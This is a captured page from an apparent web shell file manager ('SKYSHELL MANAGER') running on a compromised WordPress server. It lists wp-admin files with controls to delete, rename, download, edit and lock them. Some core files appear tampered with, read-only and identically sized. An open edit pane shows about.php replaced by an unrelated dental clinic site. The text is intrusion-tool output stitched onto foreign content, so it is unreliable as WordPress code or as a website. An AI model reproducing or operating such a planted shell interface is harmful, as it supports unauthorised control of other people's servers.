📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-advanced.php
28.79 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-tags.php
21.98 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets.php
1.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: about.php
<!DOCTYPE html> <!-- paulirish.com/2008/conditional-stylesheets-vs-css-hacks-answer-neither/ --> <!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]--> <!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang="en"> <![endif]--> <!--[if IE 8]> <html class="no-js lt-ie9" lang="en"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en"> <!--<![endif]--> <head> <meta charset="utf-8"/> <!-- Set the viewport width to device width for mobile --> <meta name="viewport" content="width=device-width"/> <title>Lion DentalCare</title> <link rel="icon" href="img/favico.png" type="image/png" sizes="16x16"> <!-- CSS Files--> <link rel="stylesheet" href="stylesheets/style.css"> <link rel="stylesheet" href="stylesheets/skins/blue.css"> <!-- skin color --> <link rel="stylesheet" href="stylesheets/responsive.css"> <!-- IE Fix for HTML5 Tags --> <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.8.1/css/all.css" integrity="sha384-50oBUHEmvpQ+1lW4y57PTFmhCaXp0ML5d60M1M7uH2+nqUivzIebhndOJK28anvf" crossorigin="anonymous"> </head> <body> <!-- HIDDEN PANEL ================================================== --> <div id="panel"> <div class="row"> <div class="four columns"> <p><b>Give us a call :</b> (+91) 80987 89587 </p> </div> <div class="four columns"> <p><b>Mail :</b> contact@liondentalcare.com</p> </div> <div class="three columns"> <p><b>Mon - Sat :</b> 08.00am - 18.00pm</p> </div> </div> </div> <p class="slide"> <a href="#" class="btn-slide"></a> </p> <!-- HEADER ================================================== --> <div class="row"> <div class="headerlogo four columns"> <div class="logo"> <a href="index.php"> <img src="img/logolion.png"> </a> </div> </div> <div class="headermenu eight columns noleftmarg"> <nav id="nav-wrap"> <ul id="main-menu" class="nav-bar sf-menu"> <li class="current"> <a href="index.php">HOME</a> </li> <li class="current"> <a href="about.php">ABOUT US</a> </li> <li> <a href="general.php">SERVICES</a> <ul> <li><a href="general.php">General Dentistry</a> <ul style="margin-left:60px;"> <li><a href="dental-exam.php">Dental Examination</a></li> <li><a href="digital-xray.php">Digital x-ray and Intra-oral camera</a></li> <li><a href="sedation.php">Sedation Dentistry</a></li> <li><a href="prophylaxis.php">Dental Prophylaxis</a></li> <li><a href="gum.php">Periodontal disease/Gum disease</a></li> <li><a href="implants.php">Dental Implants</a></li> <li><a href="root-canal.php">Root Canal</a></li> <li><a href="crown.php">Crowns and Bridge</a></li> <li><a href="filling.php">Filling</a></li> <li><a href="extraction.php">Extraction</a></li> <li><a href="night.php">Night Guard</a></li> <li><a href="partial.php">Partial and Complete Dentures</a></li> </ul> </li> <li><a href="cosmetic.php">Cosmetic Dentistry</a> <ul style="margin-left:60px;"> <li><a href="porcelain.php">Porcelain Veneers</a></li> <li><a href="luminers.php">Lumineers</a></li> <li><a href="bonding.php">Bonding</a></li> <li><a href="implants.php">Dental Implants</a></li> <li><a href="smile.php">Snap-On Smile</a></li> <li><a href="zoom.php">Zoom Whitening</a></li> </ul> </li> <li><a href="orthodontics.php">Orthodontic Services</a> <ul style="margin-left:60px;"> <li><a href="invisalign.php">Invisalign</a></li> </ul> </li> <li><a href="#">Other Services</a> <ul style="margin-left:60px;"> <li><a href="snoring.php">Snoring Appliance</a></li> <li><a href="night.php">NTI-tss Plus Night Guard</a></li> <li><a href="implants.php">Dental Implants</a></li> <li><a href="oral-surgery.php">Oral Surgery</a></li> </ul> </li> </ul> </li> <li> <a href="blog.php">BLOG</a> </li> <li> <a href="contact.php">CONTACT</a> </li> </ul> </nav> </div> </div> <div class="clear"> </div> <!-- SUBHEADER ================================================== --> <div id="subheader"> <div class="row"> <div class="twelve columns"> <p class="left"> ABOUT US </p> </div> </div> </div> <div class="hr"> </div> <!-- CONTENT ================================================== --> <div class="row"> <!-- MAIN CONTENT--> <div class="twelve columns"> <!-- Our History--> <div class="sectiontitle"> <h4>About Our Dental Care Clinic</h4> </div> <img src="img/about.jpg" style="float:right;border: 5px solid #d09022;"> <p>Our goal at The Lion DentalCare Clinic is to strive to deliver the highest level of dental care to our patients. Our Dr. believes that listening to her patients dental concerns and needs is one of her most important jobs.</p> <p>With her team, she aims at providing well planned, carefully executed dentistry to achieve results that have her patient's teeth last a life time. Her professional and caring staff help all her patients feel cared for and valued.</p> <p>We are happy to serve and happy to see you smile, always!</p> <h4>Facility</h4> <p>We are proud to provide a state-of-the-art facility for the highest quality dental care available. It is one of our top priorities to protect the well-being of our valued patients. For this reason, our office meets and surpasses all OSHA (Occupational Safety and Health Administration) and CDC (Center for Disease Control) standards. We are confident that you will feel right at home in our office as we welcome all patients as if they were family.</p> <br/> <!-- Accordion--> <dl class="tabs"> <dd class="active"><a href="#simple1">Appointments</a></dd> <dd><a href="#simple2">Financial</a></dd> <dd><a href="#simple3">Cancellation</a></dd> </dl> <ul class="tabs-content"> <li class="active" id="simple1Tab"> <p> If you would like to make an appointment, please contact our office by phone or email. Our office facilitates communications and emergency calls and appointments are available and welcome, especially for new patients seeking help. </p> </li> <li id="simple1Tab">If you would like to make an appointment, please contact our office by phone or email. Our office facilitates communications and emergency calls and appointments are available and welcome, especially for new patients seeking help.</li> <li id="simple2Tab">We will be more than happy to submit all insurance forms for you and help you recover the most from your benefits. We will do everything we can to help you afford the treatment you need and want. For patients who require major work, a complete payment plan is designed with an appropriate payment schedule. Forms of payment accepted by the office are check, cash, or any major credit card</li> <li id="simple3Tab">If you are unable to keep an appointment, we ask that you kindly provide us with at least 48 hours notice. We ask for this advance notice so that we can offer this appointment to another patient. A fee may be charged if a patient does not show up for an appointment without sufficient notice.</li> </ul> </div><!-- end main content--> <!-- SIDEBAR <div class="four columns"> <div class="teamwrap teambox"> <img src="http://www.wowthemes.net/demo/studiofrancesca/images/temp/team1.jpg" alt=""> <div class="mask"> <h2>Katrina Bernski</h2> <p> One of our best shooting model, working for this company since the beginning. <div class="social socialteam facebook"> <a href="#"></a> </div> <div class="social socialteam twitter"> <a href="#"></a> </div> <div class="social socialteam deviantart"> <a href="#"></a> </div> <div class="social socialteam flickr"> <a href="#"></a> </div> <div class="social socialteam dribbble"> <a href="#"></a> </div> </div> </div> <div class="teamwrap teambox"> <img src="http://www.wowthemes.net/demo/studiofrancesca/images/temp/team2.jpg" alt=""> <div class="mask"> <h2>Yolanda Bernski</h2> <p> One of our best shooting model, working for this company since the beginning. <div class="social socialteam facebook"> <a href="#"></a> </div> <div class="social socialteam twitter"> <a href="#"></a> </div> <div class="social socialteam deviantart"> <a href="#"></a> </div> <div class="social socialteam flickr"> <a href="#"></a> </div> <div class="social socialteam dribbble"> <a href="#"></a> </div> </div> </div> <div class="teamwrap teambox"> <img src="http://www.wowthemes.net/demo/studiofrancesca/images/temp/team3.jpg" alt=""> <div class="mask"> <h2>Luna Galliano</h2> <p> One of our best shooting model, working for this company since the beginning. <div class="social socialteam facebook"> <a href="#"></a> </div> <div class="social socialteam twitter"> <a href="#"></a> </div> <div class="social socialteam deviantart"> <a href="#"></a> </div> <div class="social socialteam flickr"> <a href="#"></a> </div> <div class="social socialteam dribbble"> <a href="#"></a> </div> </div> </div> </div><!-- end sidebar --> </div> <div class="hr"> </div> <!-- FOOOTER ================================================== --> <div id="footer"> <footer class="row"> <p class="back-top floatright"> <a href="#top"><span></span></a> </p> <div class="six columns"> <h1 style="color:#000000;">ABOUT US</h1> <p style="color:#ffffff;text-align:justify;">Our Lion DentalCare is to strive to deliver the highest level of dental care to our patients. Our Dr believes that listening to patients dental concerns and needs is one of the most important jobs. With Our team, aims at providing well planned, carefully executed dentistry to achieve results that have patient’s teeth last a life time. Professional and patient-friendly staff make patients feel cared for and valued. The Lion DentalCare was set up on the 1st of June 2018 by Our Chief..</p> </div> <div class="three columns"> <h1 style="color:#000000;">QUICK LINKS</h1> <p><a style="color:#ffffff;" href="about.php">About Us</a></p> <p><a style="color:#ffffff;" href="general.php">Services</a></p> <p><a style="color:#ffffff;" href="blog.php">Blog</a></p> <p><a style="color:#ffffff;" href="contact.php">Contact</a></p> </div> <div class="three columns"> <h1 style="color:#000000;">QUICK LINKS</h1> <p><a style="color:#ffffff;" href="privacy.php">Privacy Policy</a></p> <p><a style="color:#ffffff;" href="terms.php">Terms and Conditions</a></p> <p><a style="color:#ffffff;" href="subscribe.php">Subscribe</a></p> <p><a style="color:#ffffff;" href="unsubscribe.php">Unsubscribe</a></p> </div> </footer> </div> <div class="copyright"> <div class="row"> <div class="six columns"> ©<span class="small" style="color:#ffffff;">2025 All Rights Reserved | Lion DentalCare</span> </div> </div> </div> <!-- JAVASCRIPTS ================================================== --> <!-- Javascript files placed here for faster loading --> <script src="javascripts/foundation.min.js"></script> <script src="javascripts/jquery.easing.1.3.js"></script> <script src="javascripts/elasticslideshow.js"></script> <script src="javascripts/jquery.carouFredSel-6.0.5-packed.js"></script> <script src="javascripts/jquery.cycle.js"></script> <script src="javascripts/app.js"></script> <script src="javascripts/modernizr.foundation.js"></script> <script src="javascripts/slidepanel.js"></script> <script src="javascripts/scrolltotop.js"></script> <script src="javascripts/hoverIntent.js"></script> <script src="javascripts/superfish.js"></script> <script src="javascripts/responsivemenu.js"></script> </body> </html>
Save